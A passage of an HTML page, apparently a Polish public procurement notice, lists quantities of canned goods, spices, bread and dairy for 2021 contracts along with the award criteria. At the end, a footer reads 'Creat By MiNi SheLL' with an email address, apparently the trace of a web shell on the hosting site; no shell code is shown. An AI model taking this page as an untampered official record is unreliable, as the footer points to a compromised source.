collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>PRZETWORY KONSERWOWE, MĄCZNE, TŁUSZCZE, JAJA, PRZYPRAWY I INNE</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PRZETWORY KONSERWOWE, MĄCZNE, PRZYPRAWY, TŁUSZCZE, JAJA Ananas puszka 580g szt 40 Bazylia 10 g szt 30 Budyń 40g bez cukru typu cykoria(śmietankowy, malinowy, czekoladowy) szt 15 Brzoskwinie puszka 850 g szt 90 Curry 20g przyprawa typu prymat szt 20 Cukier kryształ w oryginalnym opakowaniu op. 1 kg kg 110 Cukier puder 0,4 kg szt 4 Cukier waniliowy 32g szt 35cieciorka konserwowa 425 ml szt 5 Cynamon 20 g szt 20 Czosnek mielony 20g szt 30 Chrzan tarty 160 g victus szt 60 Drożdże 100g szt 40 Dżem 220g(słodzony 100% sokiem typu łowicz) szt 400 Estragon 10g szt 5 Fasola „Jaś” luz kg 80 Fasola drobna luz na kg kg 110 Fasola czerwona puszka 400 g szt 40 Fasola szparagowa zielona konserwowa 0,7 szt 80 Fix do śmietany 9 g szt 30 Groszek konserwowy 400g szt 30 Groch połówki luz kg 70 Gałka muszkatołowa 15 g szt 15 Galaretka 75 g (truskawkowa, wisniowa, pomarańczowa) szt 80Herbata granulowana czarna 100g szt 260 Herbata granulowana typu lipton100g szt 40 Herbata owocowa saga 20 torebek (malina, żurawina, pigwa i truskawka) szt 30 Herbata miętowa 40 g, 100 % liści mięty pieprzowej szt 4 Imbir przyprawa 20g szt 10 Jaja L 63g-73g szt 14000 Kakao extra ciemne 100 g szt 70 Kapusta czerwona 0,9 l szt 50 Kapusta naturalnie kiszona bez octu wiaderko 5 kg Wiaderko 110 Kasza wiejska 1 kg oryginalne opakowanie szt 350 Kasza jaglana luz kg 60 Kasza gryczana niepalona luz kg 80 Kasza kukurydziana 350 g szt 2 Kasza kuskus op 1kg szt 40 Kaszka manna w oryginalnym opakowaniu 1kg kg 20 Ketchup pikantny 205g słoik (Pomidory 187 g na 100 g ketchupu) szt 30 Kawa zbozowa 147 g typu anatol szt 25 Ketchup pikantny wyciskany 480g (192g pomidorów na 100g ketchupu szt 140 Kisiel bez cukru 40g szt 140Kminek 20 g szt 10 Kolendra 15 g szt 2 Koncentrat buraczany 220g typu klimex szt 80 Koncentrat pomidorowy 30% 920g typu Międzychód szt 380 Konserwa rybna - filet z makreli w pomidorach 170g szt 40 Kukurydza konserwowa 400g szt 130 Kurkuma 10 g szt 5 Liść laurowy 10g szt 40 Lubczyk 150 g szt 110 Majeranek 300 g szt 40Majonez dekoracyjny 700ml typu winiary szt 220 Makaron 500g (kolanka ozdobne, spaghetti, świderki, muszelki, nitki cięte) 100% semolina z pszenicy durum typu lubella szt 500Makaron 500g ( łazanki) 100% semolina z pszenicy durum typu lubella szt 50Makaron 400g (muszelka morska, gniazda wstęgi, wstążki długie tagliatelle,krajanka,) 100% semolina z pszenicy durum typu lubella szt 420Makaron 400g (pióra, mini kokardki, kokardki) 100% semolina z pszenicy durum typu lubella szt 150Makaron pełnoziarnisty 400g (świderek) mąka makaronowa pszenna pełnoziarnista szt 100 Makaron catering 2 kg ( nitka cieta, świderki, muszelka, kokardki, pióra, kolanka ozdobne, łazanki) 100% semolina z pszenicy durum typu lubella szt 200 Makaron catering 1 kg ( spagetti, tagliatelle) -100% semolina z pszenicy durum typu lubella szt 150 Makaron lasagne 500g szt 12Makaron 250g(muszle duże) 100% semolina z pszenicy durum szt 5 Makaron 250g(cannelloni) 100% semolina z pszenicy durum typu lubella szt 15Makaron z warzywami trzy kolory 400g szt 50Mąka wrocławska pszenna TYP 500 w oryginalnych opakowaniach 1kg kg 800 Mąka orkiszowa typ 720 w oryginalnych opakowaniach 1 kg kg 5 Mąka tortowa typ 450 w oryginalnych opakowaniach kg 20 Mąka ziemniaczana 1kg w oryginalnych opakowaniach kg 40 Mąka zytnia typ 720 w oryginalnych opakowaniach kg 3 Mąka ryżowa kg 1Mąka kukurydziana kg 7 Migdały płatki 100g szt 5 Miód naturalny 1 litr szt 250 Morela suszona 150g bez dodatku cukrów i substancji słodzących szt 2 Musztarda stołowa słoik 200g szt 100 Mus jabłkowy 720 g szt 140Mus 100% jabłko-banan typu Kubuś szt 250Ocet spirytusowy 10 % 0,5 l szt 110 Ocet jabłkowy500ml szt 20 Ocet balsamiczny 250 ml szt 3 Ogórki konserwowe 900ml szt 210 Ogórki kiszone wiaderko 3kg wiaderko 76 Ogórki małosolne 2 kg szt 20 Oliwki zielone bez pestek op 111ml szt 3 Oregano 10g szt 40 Orzechy włoskie 100g szt 15Olej butelka 5 l typu kujawska szt 140 oliwa z oliwek 250 ml szt 2 Otręby owsiane 150g szt 2 Papryka konserwowa 900ml szt 50 Papryka mielona ostra 20g szt 220 Papryka mielona słodka 20g szt 220 Pasztet drobiowy typu profi szt 80 Proszek do pieczenia 16g szt 10 Pieprz mielony100g szt 110 Placki pszenne tortilla 25 cm, op 4 szt szt 20 Płatki kukurydziane250g typu corn flakes szt 80 Płatki owsiane górskie 500g szt 20 Płatki orkiszowe 400g szt 10 Powidła węgierkowe 310g szt 40 Pomidory suszone w oleju 165 g -typu rolnik szt 12 Przyprawa do kebabu 30 g szt 30 Przyprawa do szaszłyków 20g szt 15 Przyprawa do ziemniaków 25g (skład: sól, kolendra, czosnek, kminek, papryka słodka, koper, cząber, majeranek, papryka ostra, pieprz czarny oraz koncentrat czosnku) szt 10 Pestki dyni 100g szt 10 Przyprawa do grila 20g szt 10 Ryż długoziarnisty biały oryginalne opakowanie 1kg szt 470 Ryż naturalny op 1 kg szt 30 Rodzynki 100g szt 80 Rozmaryn 15 g szt 10 Sezam 1 kg kg 15Seler konserwowy słoik szklany 345 g szt 10 Siemie lniane 100g szt 1 Śliwki suszone 150 g bez dodatku cukrów i substancji słodzących szt 5 Słonecznik łuskany100g szt 20sok 100% bez dodatku cukru( jabłkowy, pomarańczowy, multiwitamina, wieloowocowy ) 2 litry karton 1900 sok 100% bez dodatku cukru( jabłkowy, jabłko-gruszka, jabłko - wiśnia, pomarańczowy, multiwitamina, pomarańczowo-jabłkowy, jabłko-marchew wieloowocowy 5 l) karton 1400 Sok 100 % w kartoniku ze słomką 0,2 szt 150Sól spożywcza, jodowana op.1kg kg 380 Sól sodowo-potasowa 350 g szt 20 Soda 60g szt 2 Sos sałatkowy typu knorr szt 10 Tymianek 10 g szt 25 Tuńczyk w oleju 170g w kawałkach szt 40Wegeta 75 g szt 10 Woda n/g 5 l szt 140 Woda n/g 1,5l szt 30 Woda n/g mineralna 0,5 l szt 450 Zioła prowansalskie 10 g szt 5 Zaprawa żurek na naturalnym zakwasie 500ml (butelka szklana) szt 250 Zaprawa żurek na naturalnym zakwasie 5 l szt 20 Ziele angielskie 15g szt 90 Żurawina suszona 100g szt 10 Żelatyna 50g szt 10<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15300000-1, 15000000-8, 15830000-5, 15610000-7, 15851100-9, 15872400-5, 15981000-8, 15320000-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>PIECZYWO</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PIECZYWO, CIASTO Bułka mała 60 g szt 8000 Bułka hamburgerowa 120g szt 300 Bułka kukurydziana 80g szt 2000 Bułka graham 80g szt 7000 Bułka hot-dog 80g szt 360 Bułka mleczna 60 g szt 200 Rogal maślany 60g szt 100 Bułka tarta 1 kg kg 350Chleb wieloziarnisty 500g krojony szt 360 Chleb zwykły 600g krojony szt 1100 Bagietka 30cm szt 30 Chleb razowy żytni 500g - krojony szt 330 Chleb pasterski 500g krojony szt 140 Chleb wiejski 500g szt 80 Kawiorek 350gr krojony szt 300 Drożdżówki 100g, szt 1800 ciastko francuskie z jabłkiem szt 150 Pączek szt 70 Babka poznańska kg 6 Pierniki kg 6 Rogale kg 8 Makowiec kg 5 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15300000-1, 15811000-6, 15810000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>NABIAŁ</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>NABIAŁ Jogurt owocowy (zawartość cukru do 13,5g/100g) 150g szt 2750 Jogurt naturalny 180 g szt 130 Jogurt naturalny z ziarnami zbóz 175g szt 130 Jogurt naturalny 370 g, Skład (mleko, białka mleka, żywe kultury bakterii) szt 130 Jogurt naturalny typu greckiego 330 g (mleko, śmietanka, białka mleka, żywe kultury bakterii) szt 70 Jogurt actimel 4 pak szt 300 Kefir 400g naturalny 2 %tł.(mleko, żywe kultury kefirowe) szt 60 Masło extra 200g zaw.tłuszcz.82% szt 2600Mleko 2% pasteryzowane butelka 1 ltr l 610 Mleko karton 2 % szt 900 Maślanka typu mrągowska 1 l, (maślanka, mleko, żywe kultury bakterii mlekowych) szt 100 Maślanka typu mrągowska 1 l, smakowa szt 20 Mleko sojowe 1 l kartonik szt 2 Ser smażony wielkopolski 200g szt 100 ser feta 270 g szt 35 Ser topiony bloczki 100g szt 80 Ser topiony krążki typu hochland 180g szt 75 Serki topione smietankowe typu kiri 6 szt szt 30 Ser do smarowania w kubeczku typu hochland 150 g szt 30 Serek smietankowy z papryką150 g plastry typu capressi szt 30 Ser almette 150 g szt 300 Ser almette 150 g fruit szt 50 Ser twarogowy typu tartare : łososiowy, borowikowy las, orzechowy, pomidorowy szt 40 Serek puszysty łaciaty (naturalny, meksykański, z czosnkiem, z chrzanem, z cebula i szczypiorkiem) 150 g szt 40Ser kanapkowy śmietankowy 150 g typu hochland szt 140 Ser kanapkowy 130 g typu hochland ( ze szczypiorkiem, z szynką, z prazoną cebulką, z czosnkiem i ziołami, z ogórkiem i koperkiem) szt 60 Ser mascarpone 250g szt 20 Ser pleśniowy camembert 120 g szt 60 Ser pleśniowy brie 125g szt 20 Serek homogenizowany poznański 200g szt 10 Ser mozarella 125 g szt 40 Sery żółte różne zaw. tłuszcz. nie mniej niż 40%( salami, gouda) kg 170 Sery żółte różne zaw. tłuszcz. nie mniej niż 40%( królewski, rolada ustrzycka) kg 170 Ser żółty (emmentalerr, massdamer) kg 30 Śmietana słodka 12% 0,5 l- kartonik szt 840 Śmietana kremówka 30 % 250 ml-kartonik szt 110 Śmietana zakwaszana 18% 180g szt 300 Śmietana zakwaszana 18% luz litr 260 Gzik Wielkopolski 200 g szt 50 Twarożek domowy grani typu piątnica 150g szt 100 Serek wiejski 200 g typu piątnica szt 160 Twaróg extra śmietankowy mielony kg 620 Twaróg wędzony zaw.tłuszcz.26% 250g szt 45 <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15300000-1, 15511000-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2021-01-02<br/>data zakończenia: 2021-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">NAJNIŻSZA CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN PŁATNOŚCI</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com